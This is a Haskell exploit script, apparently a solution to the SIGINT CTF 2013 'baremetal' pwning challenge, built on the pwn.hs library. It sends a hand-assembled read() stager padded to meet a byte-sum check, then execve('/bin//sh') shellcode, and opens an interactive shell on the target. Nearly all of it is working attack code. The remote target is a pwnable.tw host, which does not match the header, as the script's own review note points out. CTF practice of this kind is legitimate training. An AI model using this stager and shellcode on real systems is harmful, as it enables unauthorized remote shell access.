#!/usr/bin/env stack | |
-- stack --stack-yaml ./stack.yaml runghc | |
-- SIGINT CTF 2013: baremetal | |
-- http://shell-storm.org/repo/CTF/SIGINT-2013/pwning/baremetal-100/ | |
{-# LANGUAGE OverloadedStrings #-} | |
import Control.Concurrent (threadDelay) | |
import Control.Monad | |
import Control.Monad.Reader (runReaderT) | |
import Data.Bits | |
import qualified Data.ByteString.Char8 as BS | |
import Data.Char | |
import Data.Maybe | |
import Data.Monoid ((<>)) | |
import Hexdump | |
import Numeric | |
import System.Environment (getArgs) | |
-- https://github.com/Tosainu/pwn.hs | |
import Pwn | |
-- | Render a value with 'show' and pack the result into a strict
-- 'BS.ByteString'.  Char8 packing keeps only the low byte of each
-- 'Char', which is lossless for the ASCII output of derived 'Show'
-- instances.
show' :: (Show a) => a -> BS.ByteString
show' value = BS.pack (show value)
-- | Entry point.  The first command-line argument selects the target:
-- @remote@ connects to the public instance, anything else (or no
-- argument) to the local VM.  The connected tube is handed to 'exploit'.
--
-- NOTE(review): the header names SIGINT CTF 2013 "baremetal", while the
-- @remote@ target below is a pwnable.tw host/port — confirm this is the
-- intended instance before pointing the exploit at it.
main :: IO ()
main = do
  args <- getArgs
  tube <- case args of
    ("remote" : _) -> remote "chall.pwnable.tw" 10102
    _              -> remote "192.168.122.10" 4000
  exploit tube
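-- | Drive the two-stage exploit over an open tube.
--
-- Stage 1 is a 14-byte stager that sets up @read(0, buf, 0x7f)@
-- (eax = 3, ebx = 0, ecx = edi, edx = 0x7f) and traps into the kernel, so
-- the target pulls a second buffer over the same connection.  The stager
-- is followed by 0xff filler bytes plus one remainder byte so that the
-- byte sum of the payload is exactly 0x1ee7 (presumably the checksum the
-- challenge verifies — confirm against the binary), a NUL, then nops up
-- to offset 0x3c, where a single @xchg eax, edi@ (0x97) is placed.
--
-- Stage 2 is a 24-byte @execve("/bin//sh")@ shellcode preceded by enough
-- nops to cover the already-executed stager bytes, since the read lands
-- the new buffer at the same address.
--
-- Unlike a silent negative 'BS.replicate', the layout checks below call
-- 'error' when the stager does not fit before offset 0x3c or when the
-- stager's own byte sum already exceeds the checksum target; either case
-- would otherwise produce a misaligned payload that fails only on the
-- remote side.
exploit :: (Tube a) => a -> IO ()
exploit r = do
  send r stage1Payload
  sendline r stage2Payload
  interactive r
  where
    -- Hand-assembled stager, byte for byte.  (The leading 0xff byte is
    -- kept as in the original; its role is not documented here.)
    stage1 :: [Int]
    stage1 = [ 0xff
             , 0x87, 0xcf       -- xchg edi, ecx
             , 0x31, 0xdb       -- xor ebx, ebx
             , 0x8d, 0x43, 0x03 -- lea eax, [ebx+3]    ; SYS_read
             , 0x8d, 0x53, 0x7f -- lea edx, [ebx+0x7f] ; byte count
             , 0xcd, 0x80       -- int 0x80
             , 0x90             -- nop
             ]

    checksumTarget = 0x1ee7
    xchgOffset     = 0x3c

    -- 0x1ee7 = sum stage1 + 0xff * fillCount + fillRest
    deficit = checksumTarget - sum stage1
    (fillCount, fillRest)
      | deficit < 0 = error "exploit: stage1 byte sum already exceeds 0x1ee7"
      | otherwise   = deficit `quotRem` 0xff

    -- stager + checksum filler + remainder byte + NUL terminator
    stagerWithChecksum = BS.concat
      [ BS.pack (map chr stage1)
      , BS.replicate fillCount '\xff'
      , BS.singleton (chr fillRest)
      , "\x00"
      ]

    -- Nop-sled from the end of the stager up to offset 0x3c.  A negative
    -- length would make BS.replicate return empty and shift the xchg.
    nopPad
      | padLen < 0 = error "exploit: stage1 does not fit before offset 0x3c"
      | otherwise  = BS.replicate padLen '\x90'
      where padLen = xchgOffset - BS.length stagerWithChecksum

    stage1Payload = stagerWithChecksum <> nopPad <> "\x97"  -- xchg eax, edi

    -- execve("/bin//sh", ["/bin//sh"], NULL) via int 0x80:
    --   xor edx,edx; push edx; push "//sh"; push "/bin"; mov ebx,esp;
    --   push edx; push ebx; mov ecx,esp; lea eax,[edx+0xb]; int 0x80
    shellcode :: BS.ByteString
    shellcode = "\x31\xd2\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"

    -- Nops over the stager bytes that have already run, then the shellcode.
    stage2Payload = BS.replicate (length stage1) '\x90' <> shellcode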